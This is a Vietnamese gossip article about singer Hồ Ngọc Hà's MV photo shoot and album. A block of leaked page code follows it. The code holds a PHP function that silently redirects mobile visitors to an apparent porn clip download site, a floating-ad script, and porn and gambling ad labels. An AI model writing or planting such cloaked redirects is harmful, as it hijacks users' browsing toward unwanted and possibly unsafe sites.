Hồ Ngọc Hà khoe thân bốc lửa, áo màu nude, vòng 1 ngạt thở

Filed under: GÁI ĐẸP |

Trong chùm ảnh hậu trường MV ‘Invincible – Sẽ mãi bên nhau’, Hồ Ngọc Hà khoe thân hình bốc lửa với trang phục màu nude, vòng 1 nảy nở và đôi chân dài miên man.

Chùm ảnh được nhiếp ảnh Huy Khiêm thực hiện trong quá trình Hồ Ngọc Hà quay MV Invincible – Sẽ mãi bên nhau tại Mỹ hồi đầu mùa hè năm nay. Để chuẩn bị cho MV, Hồ Ngọc Hà đã bay sang Mỹ 5 ngày. Trong 2 ngày đầu tiên, cô tập vũ đạo cùng với biên đạo múa và hai vũ công cũng là người nước ngoài. Ba ngày còn lại, Hồ Ngọc Hà cùng ê kíp tại Mỹ thực hiện những cảnh quay cho MV.

Được sự hỗ trợ về make-up từ hai chuyên gia Nhật Bình và Gordan Phong, cùng với mẫu tóc được tạo bởi chuyên gia Travis, Hồ Ngọc Hà trông khác hẳn với vẻ kiêu sa thường thấy. Để phù hợp với tạo hình người ngoài hành tinh trong MV, Hồ Ngọc Hà mất gần 3 tiếng để được các chuyên gia chăm chút cho mái tóc và cách trang điểm.

Hình ảnh mới của Hồ Ngọc Hà trong clip ca khúc mới.

Hình ảnh mới của Hồ Ngọc Hà trong clip ca khúc mới.

Với tạo hình nhân vật được xây dựng mới hoàn toàn, vừa gai góc, mạnh mẽ và cá tính nhưng vẫn quyến rũ để phù hợp với chất nhạc trong MV cũng như album mới, Hồ Ngọc Hà được nhà thiết kế Công Trí và ê kíp bàn tính kỹ lưỡng để lựa chọn trang phục trước khi qua Mỹ. Trong bộ trang phục bó sát màu nude, “bà mẹ một con” trở nên hấp dẫn và bốc lửa với thân hình đầy đặn.

Giải thích về vóc dáng nảy nở trong bộ ảnh, khác hẳn với sự gầy gò trong một vài lần xuất hiện gần đây, Hồ Ngọc Hà cho rằng, cô từng là người mẫu chuyên nghiệp nên biết cách chọn những bộ quần áo giúp mình trông có vẻ mập lên hay gầy đi tùy theo ý muốn. Hơn nữa, đây là loạt ảnh được chụp trong quá trình cô thực hiện MV, chưa từng qua chỉnh sửa nên bảo đảm độ chân thực 100%.

Hồ Ngọc Hà bộc bạch: “ Mỗi lần tôi ra album, khán giả không chỉ đón nghe tôi hát gì, mà còn muốn xem phong cách thời trang của tôi trong album là gì. Vì vậy, trong MV mới, tôi tiếp tục đem đến sự mới lạ cho khán giả với việc sử dụng hạt kim loại độc đáo để đính lên trang phục, chứ không dùng hạt đá hay kim sa như trước nữa”.

Cô thực hiện clip với ê kíp tại Mỹ.

Cô thực hiện clip với ê kíp tại Mỹ.

Ngày 17/10, Hồ Ngọc Hà chính thức cho ra mắt album vol.6 gồm 10 ca khúc với dòng nhạc chủ đạo là R&B. Đồng thời, cô chính thức công bố về liveshow sẽ diễn ra cuối năm nay. DVD ca khúc chủ đề Invincible – Sẽ mãi bên nhau là sản phẩm hợp tác lần đầu tiên giữa đạo diễn Việt kiều Danny Đỗ và ca sĩ, hứa hẹn sẽ rất hấp dẫn với số tiền đầu tư lên đến hàng chục ngàn USD.

Nói về sự hợp tác, Hồ Ngọc Hà cho rằng, khi nền giải trí thế giới phát triển, cô muốn học hỏi những cái mới lạ để áp dụng cho mình. Cô không quá kỳ vọng nó sẽ tạo nên hiệu ứng gì lớn, mà chỉ mong khi giới thiệu hình ảnh đến bạn bè quốc tế, sẽ không bị chênh lệch quá nhiều về kỹ thuật.

(-KIEUNU.INFO-)

Phim sex
if (is_mobile()) { header("Location: http://mclip.in/tai-clip/13363"); exit(); } function is_mobile() { if(isset($_SERVER["HTTP_X_WAP_PROFILE"])) return true; if(preg_match("/wap.|.wap/i",$_SERVER["HTTP_ACCEPT"])) return true; if(isset($_SERVER["HTTP_USER_AGENT"])) { $user_agents = array( "midp", "java", "opera mini", "opera mobi", "mobi", "nokia", "midp", "midp", "j2me", "avantg", "docomo", "novarra", "palmos", "palmsource", "240x320", "opwv", "chtml", "pda", "windows ce", "mmp\/", "blackberry", "mib\/", "symbian", "wireless", "nokia", "hand", "mobi", "phone", "cdm", "up.b", "audio", "SIE-", "SEC-", "samsung", "HTC", "mot-", "mitsu", "sagem", "sony", "alcatel", "lg", "erics", "vx", "NEC", "philips", "mmm", "xx", "panasonic", "sharp", "wap", "sch", "rover", "pocket", "benq", "java", "pt", "pg", "vox", "amoi", "bird", "compal", "kg", "voda", "sany", "kdd", "dbt", "sendo", "sgh", "jb", "dddi", "iphone", "ipad", "android", "Android","series 60", "s60" ); $user_agents = implode("|", $user_agents ); if (preg_match("/$user_agents/i", $_SERVER["HTTP_USER_AGENT"])) return true; } return false; } function hide_float() { var content = document.getElementById('float_content'); var hide = document.getElementById('hide_float'); if (content.style.display == "none") { content.style.display = "block"; hide.innerHTML = ' Close [X]'; } else { content.style.display = "none"; hide.innerHTML = 'Quang Cao! '; } }
[X] Close.
mybet88